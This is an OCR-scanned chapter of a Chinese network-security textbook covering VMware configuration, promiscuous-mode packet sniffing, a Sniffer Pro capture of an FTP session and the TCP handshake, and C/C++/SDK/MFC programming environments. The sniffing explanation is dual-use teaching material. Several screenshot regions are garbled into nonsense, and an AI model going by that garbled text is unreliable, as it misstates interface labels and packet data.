1) 修改 虚拟 内 存 的 大 小 

方法 : 运行 虚拟 机 软件 一 在 菜单 栏 中 选择 VM 一 在 下 拉 列 表 中 选择 Settings, 单 击 之 
后 ,弹出 Virtual Machine Settings 对 话 框 ,如 图 3-4 所 示 ,在 此 对 话 框 中 ,进行 内 存 修改 , 通 
过 选择 Hardware~Memory-~ 通 过 拖 动 箭头 ,选择 合适 的 内 存 大 小 。 滑 块 下 面 的 三 个 数值 
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从 上 到 下 分 别 代 表 : 客户 机 操作 系统 推荐 的 最 小 值 、 建 议 的 内 存 大 小 、 建 议 的 最 大 内 存 
大 小 。 


Yirtual Nachine Settings 


Hardware |Options| 


Device my: 

Specfy the amount of memory alocated to this virtual 
二 memoy 
Pe] yy machine, The memory size must be a multiple of 4 MB. 


CDIDVD (IDE) es E virtual machine; 


司 
456 国 | 


512 MB 


独 Processors 


图 3-4 更 改 内 存 大 小 


2) 添加 和 删除 虚拟 硬盘 

在 Hardware 选项 卡 中 ,选择 Hard Disk(SCSD 选 项 , 单 击 Add, 进 行 虚拟 硬盘 的 添加 。 
弹出 Hardware Type 对 话 框 ,如 图 3-5 所 示 , 从 中 选择 要 添加 的 硬件 设备 一 一 Hard Disk, 单 
击 Next, 出 现 Select a Disk 对 话 框 ,选择 Create a new virtual disk 并 设 定好 其 存放 的 位 置 ， 
添加 的 过 程 和 前 面 的 虚拟 机 配置 过 程 一 样 ,此 处 不 再 重复 ,这 样 就 可 以 完成 虚拟 硬盘 的 添 
加 。 同 样 ,进行 删除 虚拟 硬盘 时 ,只 需 先 选中 Hard Disk 选项 卡 再 单 击 Remove 就 可 完成 
删除 。 

6. 使 用 虚拟 机 的 几 点 说 明 

(1) 虽然 虚拟 机 与 宿主 机 共用 一 套 硬件 ,但 是 在 虚拟 机 中 安装 系统 时 ,虚拟 机 操作 系统 
所 识别 的 设备 品牌 与 真实 的 物理 设备 是 不 一 致 的 ,如 显卡 、 网 卡 都 是 虚拟 的 设备 。 

(2) 虚拟 机 的 磁盘 不 要 选择 “分 配 所 用 磁盘 空间 ”, 采 用 “用 多 少 占 多 少 ” 的 原则 比较 节 
约 宿主 机 的 磁盘 空间 。 

(3) VMware 具有 “丢弃 磁盘 全 部 改变 ”的 功能 ,对 虚拟 机 上 的 操作 系统 所 做 的 修改 ,只 
要 重新 启动 虚拟 机 就 可 以 恢复 到 之 前 的 状态 。 

(4) 为 虚拟 机 分 配 的 内 存量 不 要 过 大 ,因为 这 个 内 存量 是 在 虚拟 机 启动 后 要 真正 使 用 
的 内 存量 ,分 配 过 大 会 影响 宿主 机 的 性 能 。 

(5) 安装 VMware 工具 可 以 获得 一 些 实用 的 功能 ,如 鼠标 自由 移入 移出 、 宿 主机 与 虚拟 
机 直接 手动 复制 文件 .整理 虚拟 机 磁盘 闲置 空间 等 。 
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Device Summary oie 
量 nemoy 55 Red Hat Enterprise linuxsvmdk 
SHard Disk (C5) 8GB 

Capacity 


CDIDYD (IDE) Using fle auton... 
和 Cument size: 11MB Systemfree: 15 


Serial Port 
Parallel Port 
Generic 5C5I Device 


图 3-5 选择 硬件 的 类 型 


(6) 为 了 与 宿主 机 的 快捷 键 Ctrl 十 Alt 十 Delete 区 别 ,在 虚拟 机 中 用 快捷 键 Ctrl 十 Alt 十 
Insert 代替 快捷 键 Ctrl 二 Alt 十 Delete。 


3.3 网 络 协议 分 析 器 的 使 用 


3.3.1 网 络 协议 分 析 器 的 工作 原理 


为 了 更 好 地 使 用 网 络 协议 分 析 器 ,下 面 先 了 解 一 下 它们 的 工作 原理 以 及 相关 知识 。 网 
络 分 析 (Network Analysis) 是 指 通 过 捕捉 网 络 流动 的 数据 包 , 查 看 包 内 部 数据 ,进而 来 发 现 
网 络 中 出 现 的 各 种 问题 的 过 程 。 

1. 捕获 数据 包 的 基础 

网 络 分 析 系 统 首先 依赖 于 一 套 捕捉 网 络 数据 包 的 函数 库 。 这 套 函 数 库 工作 在 网 络 分 析 
系统 模块 的 最 底层 。 作 用 是 从 网 卡 取得 数据 包 或 者 根据 过 滤 规 则 取出 数据 包 的 子 集 ,再 转 
交 给 上 层 分 析 模 块 。 从 协议 上 说 ,这 套 函 数 库 将 一 个 数据 包 从 链 路 层 接收 ,至 少将 其 还 原 至 
传输 层 以 上 ,以 供 上 层 分 析 。 在 Linux 系统 中 ,Libpcap 是 一 个 基于 BPF 的 开放 源码 的 捕 包 
函数 库 。 现 有 的 大 部 分 Linux 抓 包 工具 都 是 基于 这 套 函 数 库 或 者 是 在 它 基础 上 做 一 些 针 对 
性 的 改进 。 同 样 在 Windows 系统 中 .有 这 样 一 个 基本 函数 库 一 一 Winpcap ,在 Windows 中 
运行 的 抓 包 工具 都 以 它 为 基础 ,完成 捕获 数据 包 、 解 码 . 并 显示 网 络 流量 的 功能 。Libpcap 
的 下 载 地 址 是 : http://sourceforge. net/projects/libpcap/。 由 于 在 Windows 下 安装 抓 包 
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工具 时 , 它 会 自动 将 Winpcap 函数 库 装 上 ,所 以 不 用 另行 安装 。 

2. 包 捕获 机 制 

从 广义 的 角度 上 看 ,一 个 包 捕获 机 制 包含 三 个 主要 部 分 : 最 底层 是 针对 特定 操作 系统 
的 包 捕 获 机 制 ,最 高 层 是 针对 用 户 程序 的 接口 ,第 三 部 分 是 包 过 滤 机 制 。 不 同 的 操作 系统 实 
现 的 底层 包 捕 获 机 制 可 能 是 不 一 样 的 ,但 从 形式 上 看 大 同 小 异 。 数 据 包 常 规 的 传输 路 径 依 
次 为 网 卡 、 设 备 驱 动 层 .数据 链 路 层 、IP 层 、 传 输 层 ,最 后 到 达 应 用 程序 。 而 包 捕获 机 制 是 在 
数据 链 路 层 增加 一 个 旁 路 处 理 , 对 发 送 和 接收 到 的 数据 包 做 过 滤 / 缓 冲 等 相关 处 理 ,最 后 直 
接 传递 到 应 用 程序 。 值 得 注意 的 是 , 包 捕 获 机 制 并 不 影响 操作 系统 对 数据 包 的 网 络 处 理 。 
对 用 户 程序 而 言 , 包 捕获 机 制 提供 了 一 个 统一 的 接口 ,使 用 户 程序 只 需要 简单 地 调用 若干 函 
数 , 就 能 获得 所 期 望 的 数据 包 。 这 样 一 来 ,针对 特定 操作 系统 的 捕获 机 制 对 用 户 透明 ,使 用 
户 程序 有 比较 好 的 可 移植 性 。 包 过 滤 机 制 是 对 所 捕获 到 的 数据 包 根 据 用 户 的 要 求 进行 得 
选 ,最 终 只 把 满足 过 滤 条 件 的 数据 包 传递 给 用 户 程序 。 

3. 网 络 分 析 软 件 的 原理 

首先 来 了 解 一 下 网 卡 的 工作 方式 。 在 以 太 网 络 中 ,所 有 通信 都 是 以 广播 方式 工作 的 , 同 
一 个 网 段 内 的 所 有 网 络 接口 都 可 以 访问 在 物理 媒体 上 传输 的 所 有 数据 ,而 每 一 个 网 络 接口 
都 有 一 个 唯一 的 硬件 地 址 , 即 MAC 地 址 。 在 正常 的 情况 下 ,一 个 网 络 接口 只 可 能 响应 以 下 
两 种 数据 帧 : 与 自己 MAC 地 址 相 匹配 的 数据 帧 和 发 向 所 有 机 器 的 广播 数据 帧 。 但 在 实际 
的 系统 中 ,数据 的 收发 一 般 都 是 由 网 卡 完成 的 ,而 网 卡 的 工作 模式 有 以 下 4 种: 广播 ,这 
种 模式 下 的 网 卡 能 接收 发 给 自己 的 数据 帧 和 网 络 中 的 广播 数据 帧 ; @( 默 认 ) 组 播 ,这 种 模 
式 下 的 网 卡 只 能 够 接收 组 播 数据 帧 ; @ 直 接 , 这 种 模式 下 的 网 卡 只 能 接收 发 给 自己 的 数据 
帧 ; 印 混杂 ,这 种 模式 下 的 网 卡 能 接收 通过 网 络 设备 上 的 所 有 数据 帧 。 从 上 面 可 知 ,虽然 网 
卡 在 默认 情况 下 仅 能 接收 发 给 自己 的 数据 和 网 络 中 的 广播 数据 ,但 可 以 强制 将 网 卡 置 于 混 
杂 模 式 工作 ,那么 此 时 该 网 卡 便 会 接收 所 有 通过 网 络 设备 的 数据 ,而 不 管 该 数据 的 目的 地 是 
谁 。 通 过 将 网 卡 的 工作 模式 置 为 混杂 模式 (promiscuous) ,并 接收 通过 网 卡 的 所 有 数据 包 ， 
从 而 达到 嗅 探 (监听 ) 的 目的 ,这 种 技术 就 是 嗅 探 (监听 ) 技 术 。 结 合 以 上 描述 的 工作 原理 ,网 
络 分 析 软 件 就 是 遵循 以 太 网 工作 模式 , 它 基 于 以 太 网 嗅 探 技 术 , 以 旁 路 接 入 的 方式 进行 工 
作 。 系 统 首 先 将 本 地 机 器 上 的 网 卡 置 为 混杂 模式 ,使 其 通过 嗅 探 技 术 捕获 网 络 中 传输 的 所 
有 数据 包 , 然 后 将 这 些 数据 包 传 递 到 系统 内 部 进行 分 析 , 青 将 分 析 结 果 以 文本 、 图 表 等 不 同 
的 方式 实时 显示 在 界面 中 。 


3.3.2 Sniffer Pro 协议 分 析 器 的 使 用 


在 Windows 下 ,比较 常用 的 抓 包工 具有 Sniffer Pro、Wireshark( 前 身 Ethereal) 、Omnipeek 
(以 前 的 Etherpeek)、WinDump、Analyzer 等 。 网 络 嗅 探 软件 种 类 很 多 ,主要 是 依靠 一 些 特 
性 来 区 分 的 。 例 如 一 些 网 络 嗅 探 软 件 只 支持 以 太 网 适配器 或 无 线 适 配器 ,而 有 些 却 支持 多 
种 类 型 的 适配器 ,并 且 允 许 用 户 定 制 ; 还 有 ,尽管 许多 网 络 嗅 探 软 件 可 以 解码 相同 的 网 络 协 
议 , 但 是 ,其 中 的 某 些 嗅 探 软 件 就 有 可 能 比 其 他 的 嗅 探 软件 更 适合 自己 的 网 络 结构 。 所 以 要 
结合 自己 的 需要 和 对 网 络 嗅 控 软件 功能 的 了 解 ,最 终 选 择 用 哪 一 款 网 络 嗅 探 软件 。 下 面 对 
Sniffer Pro 的 使 用 进行 介绍 。 
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Sniffer 软件 是 NAI 公司 推出 的 功能 强大 的 协议 分 析 软 件 ,具有 捕获 网 络 流量 ,进行 详 
细 分 析 、 实 时 监控 网 络 活动 、 利 用 专家 分 析 系 统 诊断 问题 ,收集 网 络 利 用 率 和 错误 等 功能 。 
下 面 通过 捕获 FTP 数据 包 为 例 , 说 明 如 何 使 用 Sniffer Pro。 


1. 设置 监听 网 卡 
在 使 用 Sniffer Pro 进行 抓 包 时 , 它 会 自动 检测 出 PC 上 使 用 的 网 络 适配器 ,只 要 选择 出 
所 要 监听 网 络 的 适配器 ,就 可 以 实现 抓 取 数 据 这 是 本 机 网 卡 ， 也 
包 。 运 行 File~> Select Settings, 弹 出 如 图 3-6 SE 是 被 监听 的 网 卡 
所 示 的 界面 。 Select settings for momtarne 
. 日 10ocal) New... 
2. 设置 过 滤 规 则 ey 和 


在 默认 情况 下 , Sniffer 将 捕获 其 接 入 碰撞 
域 中 流 经 的 所 有 数据 包 , 但 在 某 些 场 合 下 ,有 些 
数据 包 可 能 不 是 我 们 所 需要 的 ,为 了 快速 定位 
网 络 问 题 所 在 ,有 必要 对 所 要 捕获 的 数据 包 进 
行 过 滤 。Sniffer 提供 了 捕获 数据 包 前 的 过 滤 规 图 36 选择 监听 的 网 卡 
则 的 定义 ,过 滤 规 则 包括 二 ,三 层 地 址 的 定义 和 几 百 种 协议 的 定义 。 在 捕获 流量 时 ,使 用 者 
可 以 根据 自己 的 需要 在 不 同时 间 设 置 过 滤器 。 一 种 是 在 抓 包 之 前 , 先 定 义 一 个 过 滤器 ,只 捕 
获 与 正在 分 析 问 题 有 关 的 数据 包 , 也 可 以 先 让 Sniffer Pro 捕获 可 以 看 到 的 所 有 数据 包 , 然 
后 用 过 滤器 选择 感 兴趣 的 部 分 。 两 种 各 有 优 缺 点 ,如 使 用 第 一 种 ,使 用 者 不 用 考虑 缓存 区 的 
大 小 ,捕获 时 间 较 短 , 但 是 如 果 过 滤器 定义 不 正确 ,可 能 丢失 重要 信息 。 第 二 种 方法 在 捕获 
所 有 流量 时 ,相对 灵活 性 较 好 ,这 样 可 以 对 网 络 的 所 有 数据 有 全 面 的 了 解 ,但 有 一 个 缺陷 : 
每 秒 钟 可 能 有 上 千 个 数据 包 通 过 正在 监听 的 网 络 ,使 PC 负载 着 巨大 的 数据 量 ,影响 PC 的 
性 能 。 由 于 这 里 只 进行 简单 的 FTP 数据 包 的 抓 取 , 所 以 选择 第 一 种 方式 。 方法: 选择 
Capture~Define Filter, 在 此 对 话 框 中 进行 相关 设置 。 此 对 话 框 共 有 5 个 选项 卡 ,分 别 对 过 
滤 规 则 中 相关 的 “地址 ”“ 协 议 "”“ 缓 存 ” 文 件 进 行 设置 。 在 我 们 捕获 FTP 数据 包 时 ,FTP 
服务 器 的 地 址 是 219. 246. 5. 126 ,使 用 协议 是 TCP 中 的 FTP, 捕 获 到 的 数据 包 缓 存 的 位 置 
和 缓存 区 的 大 小 依据 情况 进行 设置 。 

首先 可 先 选 定数 据 包 分 析 文 件 保存 的 位 置 ,并 将 其 命名 为 "FTP”, 方 法 : 在 Sniffer 运 
行 界面 中 , 先 单 击 菜单 栏 中 的 Profiles ,再 单 击 New 新 建文 件 ,并 输入 文件 名 字 , 单 击 OK 就 
可 完成 ,过 程 如 图 3-7 所 示 。 当 然 也 可 以 直接 使 用 默认 设置 。 

下 一 步 : 在 打开 的 Define Filter 对 话 框 中 ,选择 Address 选项 卡 ,这 是 最 常用 的 过 滤 规 
则 定义 。 其 中 包括 MAC 地 址 IP 地 址 和 IPX 地 址 的 定义 。 现 在 以 定义 IP 地 址 过 滤 为 例 
进行 设置 。 如 图 3-8 所 示 ,注意 图 中 标记 “2”, 当 单 击 中 间 的 Dir 后 ,可 以 出 现 三 个 小 选项 ， 
如 图 3-9 所 示 ,这 表示 三 种 数据 包 的 流动 方向 ,在 本 例 中 为 了 看 到 完整 的 FTP 工作 过 程 ,在 
此 不 做 单独 设置 。 

下 一 步 : 在 打开 的 Define Filter 对 话 框 中 ,选择 Advanced 选项 卡 , 在 这 里 可 以 定义 希 
望 捕获 何 种 协议 的 数据 包 。 在 本 例 中 ,选择 IP 一 TCP 一 FTP。 在 Packet Size 中 ,可 以 设置 
想 要 捕获 大 小 是 多 少 的 数据 包 。Packet Type 设置 数据 包 的 类 型 ,在 本 例 中 ,选择 默认 
设置 。 
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图 3-8 设置 依据 IP 地 址 的 过 滤 规 则 
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图 3-9 三 种 数据 包 流动 的 方向 


下 一 步 : 仍然 在 打开 的 Define Filter 对 话 框 中 选择 Buffer 选项 卡 ,在 此 界面 中 定义 捕 
获 到 的 数据 包 存 放 地 方 以 及 缓冲 区 的 大 小 。 

3. 应 用 过 滤 规 则 ,开始 抓 包 

在 Sniffer 运行 界面 中 , 单 击 菜单 栏 上 的 Capture 一 选择 Select Filter, 在 出 现 的 对 话 框 
中 选择 刚刚 设置 好 的 过 滤 规 则 。 然 后 通过 单 击 Capture 一 选择 Start 或 者 单 击 工 具 栏 上 的 
三 角 箭头 ,表示 开始 抓 包 。 当 要 停止 捕获 时 ,同样 可 以 有 两 种 方式 , 单 击 工具 栏 上 的 “停止 ” 
按钮 ,也 可 以 选择 Capture 中 的 相应 选项 。 抓 包 结 果 如 图 3-10 所 示 。 
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No [Stra ETCITYTC3 Joest en [B] Fal Tne 局 本 
口 [219.246.5.221] [219.246.5 331 Anonyaous access alloved. send ide126 | 0:00.02.013 
Ds [219.246.5.110] [219.246.5 ACK=814426162 WIN=65436 60 | 0:00:03.014 
口 ? 【219-246-5-110] [219-246 -5 PASS 61 | 0:00:03.950 
口 1o [219-246-5 221]| [219 246-5 230_Ancnyacus user logged in 85 | 0:00:03.969 
Dl [219.246.5.110] [219.246.5 ACK=B14426193 WIN=65405 60 | 0:00:04.108 
口 12 [219 -246-5 110]| [219 246-5 PORT 219.246.5.110.6.85 79 | 0:00:06.247 
口 13 [219.246.5.221] [219.246 -5 200 PORT comaand successtul 84 | 0:00;06.250 
口 14 [219.246.5.110] [219 .246.5 NIST 60 | 0:00:06.251 
Dl1s [219.246.5.221] [219. 246.5 5 HT 0 iceaectaca103 | 0:00:06,252 
16 [219.246.5.221] [219.246.5 LEN 66 | 0:00:06,252 
D17 [219.246.5.110] [219 246.5 0:00:06 252 
口 1e [219 .246-5 221]| [219-246-5 0:00:06. 252 
Dlis ls 219.246.5.221] [219.246.5, 0:00:06.253 
口 20 [219.246.5.221] [219.246.5 0:00:06 ,253 
口 | 21 [219.246.5.110] [219.246.5 0:00:06 253 
口 | 22 【219 246.5 110] [219 246.5 0:00;06. 255 
口 23 [219.246.5-221] [219-246 5 0:00 .06. 255 
口 24 [219-246-5-110]| [219.246-5 0:00:06.405 
Dl2s [219.246.5.221] [219.246.5 0:00:06.406 
口 2 [219.246.5.110] [219.246.5 0:00 06 624 
口 27 [219.246.5.110] [219 .246.5 0:00;10.535 
口 | 28 [219 246-5 221]| [219 246-5 0:00:10.547| 性 
口 29 [219.246.5.221] [219-246 -5 0;00:10 547 
Dl30 [219 246 5 110]|[219 0.00.10 .548| 国 | 
加 i 


注意 选择 合适 的 选项 卡 


图 3-10 抓 包 结果 


4. 协议 分 析 

在 停止 抓 包 的 时 候 , 出 现 如 图 3-10 所 示 的 界面 后 , 单 击 Decode, 出 现 捕 获 到 的 数据 包 。 
因为 FTP 工作 的 过 程 中 需要 传输 层 TCP 的 支持 ,所 以 首先 要 通过 TCP 的 “三 次 握手 ”建立 
连接 , 才 可 以 进行 数据 交换 。 如 图 3-11 所 示 的 信息 ,清楚 地 表示 了 FTP 连接 建立 的 过 程 。 


cn 
AcK>814426590 WINE seo 


图 3-11 协议 分 析 


第 一 个 数据 包 : 源 端 1619 向 目的 端的 21(FTP 默认 端口 ) 端 口 发 送 数据 ,标志 位 为 
SYN 表示 同步 ,SEQ=369724012 表示 IP 为 219. 246. 5. 110 的 主机 随机 选择 的 一 个 数据 包 
序号 

第 二 个 数据 包 : 源 端 21 向 目的 端的 1619 号 端口 发 送 回 执 号 为 369724013 来 发 送 回 执 
对 话 , 这 个 序号 比 上 个 数据 包 的 SEQ 号 大 1, 同 时 服务 器 端 自己 产生 一 个 随机 选择 的 序号 
814426062 来 识别 这 次 会 话 。 

第 三 个 数据 包 : 三 次 握手 的 最 后 一 个 帧 。 工 作 站 会 发 送 一 个 回执 数据 包 (ACK = 
814426063) ,确认 收 到 来 自 服务 器 上 的 帧 。 这 样 就 成 功 建立 了 会 话 。 两 者 可 以 互通 信息 。 


3.4 网 络 安全 编程 基础 
3.4.1 编程 环境 概述 


C 语言 是 一 种 强大 的 语言 , 它 既 可 以 在 Windows 下 编程 ,也 可 以 在 Linux 下 编程 ,编程 
是 一 itt 除了 熟练 使 用 编程 工具 外 ,还 要 了 解 系统 本 身 的 内 部 工作 机 理 和 编 
程 语言 。 
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Linux 系统 下 的 应 用 程序 多 由 C 语言 编写 ,目前 Linux 系统 下 最 常用 的 C 语言 编译 器 
是 GCCCGNU Complier Collection) , 它 是 GNU 项 目 中 符合 ANSIC 标准 的 编译 系统 ,能 够 
编译 用 C、.C++ 和 Object CT 等 语言 编写 的 程序 。GCC 不 仅 功能 非常 强大 ,结构 也 异常 灵 
活 。 最 值得 称道 的 一 点 就 是 它 可 以 通过 不 同 的 前 端 模块 来 支持 各 种 语言 ,如 Java 等 。 开 
放 、 自 由 和 灵活 是 Linux 的 魅力 所 在 ,而 这 一 点 在 GCC 上 的 体现 就 是 程序 员 通 过 它 能 够 更 
好 地 控制 整个 编译 过 程 。 在 使 用 GCC 编译 程序 时 ,编译 过 程 可 以 被 细 分 为 4 个 阶段 : 预 处 
理 、 编 译 . 汇 编 . 链 接 。Linux 程序 员 可 以 根据 自己 的 需要 让 GCC 在 编译 的 任何 阶段 结束 ， 
以 便 检 查 或 使 用 编译 器 在 该 阶段 的 输出 信息 。 和 其 他 常用 的 编译 器 一 样 ,GCC 也 提供 了 灵 
活 而 强大 的 代码 优化 功能 ,利用 它 可 以 生成 执行 效率 更 高 的 代码 。GCC 提供 了 30 多 条 警 
告 信息 和 三 个 警告 级 别 , 使 用 它们 有 助 于 增强 程序 的 稳定 性 和 可 移植 性 。 此 外 ,GCC 还 对 
标准 的 C 和 C++ 语言 进行 了 大 量 的 扩展 ,提高 了 程序 的 执行 效率 ,有 助 于 编译 器 进行 代码 
优化 ,还 能 够 减轻 编程 的 工作 量 。 

在 Windows 下 用 VC++ 来 进行 编程 。C 语言 中 ,目前 有 两 大 语言 是 编程 者 的 主流 选 
择 : C++ 和 Java。C++ 适 合 进行 系统 软件 开发 ,Java 适宜 进行 网 络 应 用 开发 。 虽 然 VC++. NET 
已 经 面世 很 久 , 但 是 C++ 的 开发 工具 目前 的 主流 依然 是 Visual C++ 和 C++Builder 6. 0。 
VC++ 是 基于 C,C++ 的 集成 开发 工具 , 它 可 以 识别 C/C++ 并 编译 ,支持 MFC 类 库 ,并 提供 了 
一 系列 模板 ,常用 的 有 MFC AppWizard(EXE/DLL),MFC ActiveX ControlWizard, Win32 
Application, Win32 Console Application ,ATL COM AppWizard。 这 种 可 视 化 编程 环境 可 
以 令 程 序 员 花 更 多 精力 在 程序 功能 的 实现 上 ,而 不 是 底层 的 建设 上 ,这 就 大 大 加 快 了 程序 开 
发 速度 和 效率 ,这 也 是 Visual C++ 一 个 显著 的 特点 。 利 用 Visual C++ 编译 出 的 程序 空间 
小 .运行 快 , 比 其 他 的 编译 工具 编译 出 的 软件 占据 更 多 优势 。 现 在 常用 的 版 本 有 Visual 
C++ 6.0/. NET/2005。 下 面 通过 一 个 程序 来 说 明 VC++ 集 成 开发 工具 的 使 用 。 

(1) 进入 VC++ 的 编程 界面 ,选择 菜单 栏 中 的 “文件 ”~ 单 击 “ 工 程 ”, 打 开 如 图 3-12 所 示 
对 话 框 ,在 这 里 选择 新 建 一 个 控制 台 程序 Win32 Console Application ,输入 工程 名 称 "test”， 
并 选 好 保存 位 置 。 


文件 工程 | 工作 区 | 其 文档] 


工程 名 称 叫 : 


位 置 [Qj 
[CADocuments and Setings\l\ .| 


wn Console pheaian 
pyr 


加 Wi 
司 win32 Static Library 


图 3-12 ”新建 工程 
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(2) 单 击 “ 确 定 ” 按 钮 后 ,进入 下 面 的 设置 ,选择 默认 的 选项 一 An empty project, 完 成 创 
建 工程 模板 。 

(3) 单 击 “ 完 成 ”按钮 ,出 现 工程 总 结对 话 框 ,检查 没有 错误 , 单 击 “ 确 定 ” 按 钮 ,出 现 工作 
界面 ,如 图 3-13 所 示 。 


文件 编辑 查看 插入 工程 编译 工具 窗口 帮助 

秒 | 芝 加 轩 | 允 年 高 | 至 志 ” | 世 砚 于 | 名 mn 

eva oomemberdeonm | 
三 = 


和 外 -itestfiles 


图 3-13 VC++ 的 工作 界面 
(4) 因为 建立 的 工程 是 空 的 ,没有 一 个 程序 文件 ,需要 为 工程 添加 程序 文件 ,选择 菜单 
栏 中 的 “文件 ”>“ 新 建 ”, 出 现 如 图 3-14 所 示 界 面 ,选择 “文件 ”选项 卡 , 选 择 添加 的 文件 类 型 
C++ Source File, 并 输入 文件 名 。 


新 奸 RIE 


文件 | 工程 | 工作 区 | 其 它 文档 | 

Active Server Page FA 添加 工程 : 

Binary File 

Bitmap File st | 
BD CIC++ Header File 


选择 文 OE 


File 
Source File 
——— 


件 类 型 
HTML Page 六 一 一 一 一 输入 
Alcon File les! 文件 名 
[Macro File 
Resource Script L 目 录 : 
加 Resource Template CProgram Files\Microsoft Visuz 一 
SQL Script File 


国 Text File 


图 3-14 新 建 源 程序 文件 
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(5) 单 击 “ 确 定 ? 按 钮 后 ,出 现 文件 编辑 界面 ,如 图 3-15 所 示 ,并 在 此 窗口 中 输入 程序 ， 
完成 后 ,进行 编译 链接、 执行 ,其 中 标号 1、4 的 作用 相同 ,表示 编译 ,2、5 相同 ,表示 链接 ,3、 
6 相同 ,表示 执行 。 最 后 出 现 程 序 结果 ,如 图 3-16 所 示 。 


ess any key to continue 


图 3-16 程序 运行 结果 


Ci 语言 经 过 不 断 的 发 展 ,在 编程 体系 中 可 以 将 其 分 成 4 个 阶段 : 面向 过 程 的 C 语 
一 面向 对 象 的 C++ 语言 一 SDK 编程 一 MEFC(CMicrosoft Foundation Class, 微软 基 类 库 ) 


(1) C 语言 是 目前 世界 上 使 用 最 广泛 的 高 级 程序 设计 语言 之 一 。C 语言 可 用 于 多 种 场 
合 , 如 操作 系统 编程 、 系 统 应 用 程序 编程 以 及 需要 对 硬件 进行 操作 的 场合 。 由 于 它 的 效率 
高 ,可 移植 性 强 ,并 具备 很 强 的 数据 处 理 能 力 , 因 此 适 于 编写 系统 软件 ,也 比较 适合 编写 网 络 
安全 程序 。C 语言 简洁 紧凑 、 灵 活 方便 、 数 据 结构 丰富 。C 语言 是 结构 式 语言 ,请 法 限制 不 
太 严 格 ,程序 设计 自由 度 大 ,并 且 允 许 直接 访问 物理 地 址 ,可 以 直接 对 硬件 进行 操作 , 它 还 可 
以 直接 调用 操作 系统 提供 的 API 函数 编写 非常 强大 的 程序 。 所 以 ,C 语言 是 进行 网 络 安全 
程序 编程 的 首选 语言 。 

(2) C++ 是 建立 在 C 语言 之 上 的 ,最 初 被 称 为 带 类 的 C 语言 ,C++ 没有 取代 C, 而 是 补充 
和 支持 了 C。C++ 在 保留 C 原 有 精华 的 基础 上 ,提供 了 全 面 的 面向 对 象 的 编程 支持 ,使 得 程 
序 和 结构 更 加 清晰 .更 容易 维护 和 扩充 ,同时 又 不 丧失 其 高 效 性 。 其 优点 主要 是 与 C 语言 
的 兼容 , 既 支 持 面向 对 象 的 程序 设计 ,也 支持 结构 化 的 程序 设计 。 修 补 了 C 语言 中 的 一 些 
漏洞 ,提供 了 更 好 的 类 型 检查 和 编译 时 的 分 析 。C++ 还 提供 了 异常 处 理 机 制 , 简 化 了 程序 的 
出 错 处 理 。 一 般 而 言 ,用 C++ 编 写 的 执行 程序 执行 速度 与 C 语言 不 相 上 下 。 
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(3) SDK 编程 。 理 解 SDK 之 前 ,要 先 明 确 下 面 两 个 概念 。 首 先 要 接触 的 是 API, 也 就 
是 Application Programming Interface, 其 实 就 是 操作 系统 留 给 应 用 程序 的 一 个 调用 接口 ， 
应 用 程序 通过 调用 操作 系统 的 API 而 使 操作 系统 去 执行 应 用 程序 的 命令 (动作 )。 在 
Windows 中 ,系统 API 是 以 函数 调用 的 方式 提供 的 。 例 如 同样 是 取得 操作 系统 的 版 本 号 ， 
在 Windows 中 所 要 做 的 就 是 调用 GetVersionEx() 函数 。DLL, 即 Dynamic Link Library 
(动态 链接 库 ) 。 人 们 经 常会 看 到 一 些 . dll 格式 的 文件 ,这 些 文件 就 是 动态 链接 库 文件 ,其 
实 也 是 一 种 可 执行 文件 格式 。 与 .exe 文件 不 同 的 是 ,. dll 文件 不 能 直接 执行 ,它们 通常 由 . exe 
在 执行 时 装 入 ,内 含有 一 些 资源 以 及 可 执行 代码 等 。 其 实 Windows 的 三 大 模块 就 是 以 
DLL 的 形式 提供 的 (Kernel32. dll,User32. dll,GDI32. dll) ,里 面 就 含有 了 API 函数 的 执行 
代码 。 为 了 使 用 DLL 中 的 API 函数 ,必须 要 有 API 函数 的 声明 (. h) 和 其 导入 库 (. lib), 导 
入 库 可 以 理解 为 是 为 了 在 DLL 中 找到 API 的 入 口 点 而 使 用 的 。 所 以 ,为 了 使 用 API 函 
数 ,就 要 有 与 API 所 对 应 的 .h 和 .lib 文件 ,而 SDK 正 是 提供 了 一 整套 开发 Windows 应 
用 程序 所 需 的 相关 文件 ,范例 和 工具 的 “工具 包 ”。 到 此 为 止 ,我 们 才 真 正 地 解释 清楚 了 
SDK 的 含义 。SDK 是 应 用 程序 开发 工具 , 它 提供 h/lib 文件 ,等 于 是 给 了 用 户 和 用 户 写 的 
程序 一 本 “字典 ”, 告 诉 用 户 API 的 确切 位 置 。 这 就 是 SDK 和 API 的 区 别 。SDK 是 基于 
API 的 “工具 ”, 由 于 SDK 包含 使 用 API 的 必需 资料 ,所 以 人 们 也 常 把 仅 使 用 API 来 编写 
Windows 应 用 程序 的 开发 方式 叫做 “SDK 编程 ”。 而 API 和 SDK 是 开发 Windows 应 用 程 
序 所 必需 的 东西 ,其 他 编程 框架 和 类 库 都 是 建立 在 它们 之 上 的 ,比如 VCL 和 MFC, 虽 然 它 
们 比 起 “SDK 编程 ?来 有 着 更 高 的 抽象 度 , 但 这 丝毫 不 妨碍 它们 在 需要 的 时 候 随 时 直接 调用 
API 函数 。 

(4) MFC 编程 。SDK 的 功能 非常 强大 ,需要 记忆 很 多 的 函数 ,当面 向 对 象 编程 成 为 主 
流 的 时 候 ,微软 将 SDK 的 函数 分 类 进行 封装 ,这 样 就 诞生 了 MFC(Microsoft Foundation 
Class) 。 传 统 的 Win32 开发 (直接 使 用 Windows 的 接口 函数 API) 对 于 程序 员 来 说 非常 困 
难 , 因 为 API 函数 实在 太 多 了 ,而 且 名 称 很 乱 。 而 MFC 的 出 现 , 将 面向 对 象 程序 设计 与 
Application Framework 完美 结合 ,将 传统 的 API 进行 了 分 类 封装 ,并 且 为 使 用 者 创建 了 程 
序 的 一 般 框架 ,大 大 简化 了 编程 者 的 工作 。 

2. Shell 语言 

Shell 就 是 UNIX 系统 提供 给 用 户 的 使 用 接口 ,Shell 处 在 内 核 与 外 层 应 用 程序 之 间 ,起 
着 协调 用 户 与 系统 的 一 致 性 、 在 用 户 与 系统 之 间 进 行 交互 的 作用 ,Shell 本 身 也 是 一 种 可 编 
程 的 程序 设计 语言 。Shell 允许 通过 编程 来 完成 复杂 的 功能 处 理 , 它 是 解释 性 的 ,而 大 部 分 
高 级 语言 是 编译 性 的 。Shell 与 系统 有 密切 的 关系 ,Shell 易 编 写 、 易 调试 ,灵活 性 较 强 ,但 速 
度 低 。Shell 作为 命令 级 语言 ,命令 组 合 功能 强 。Shell 有 两 种 主要 语法 类 型 , 即 Bourne 
